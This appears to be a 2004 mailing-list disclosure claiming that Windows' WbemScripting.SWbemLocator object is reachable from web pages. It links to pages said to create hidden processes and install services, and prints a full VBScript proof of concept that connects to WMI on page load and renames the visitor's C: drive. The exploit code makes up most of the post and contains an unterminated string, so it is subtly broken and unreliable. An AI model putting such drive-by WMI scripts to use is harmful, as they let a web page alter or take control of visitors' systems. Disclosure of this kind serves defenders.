('binary' encoding is not supported, stored as-is)
I would like to dedicate this discovery to Justyna.
WbemScripting.SWbemLocator - this object has access to WMI in Win XP ( i have Prof fully patched). , 2003 , any NT? I think, this vuln concerns all Windows where we can find WbemScripting.SWbemLocator.
I would not like to publish more exploits because of their dangerous use
more examples are at:
http://wb.pl/bartosz/wbem/process.htm - create process in hidden window
http://wb.pl/bartosz/wbem/installservice.htm - installs service
http://wb.pl/bartosz/wbem/changevolume.htm - changes volume of C:
HOME PAGE -
http://wb.pl/bartosz/
example source:
<HTML>
<HEAD>
<TITLE>Change volume of disk</TITLE>
<SCRIPT LANGUAGE="VBScript">
// I would like to dedicate this discovery to Justyna.
Sub window_onload
const impersonation = 3
Set Locator = CreateObject("WbemScripting.SWbemLocator")
Set Service = Locator.ConnectServer()
Service.Security_.ImpersonationLevel=impersonation
Set Process = Service.Get("Win32_LogicalDisk=""C:""")
Process.VolumeName = "bartosz kwitkowski
Process.Put_
end sub
</SCRIPT>
</HEAD>
<BODY>
I would like to dedicate this discovery to Justyna.
</BODY>
</HTML>
ANY QUESTIONS? ASK ME!
Received on Mar 04 2004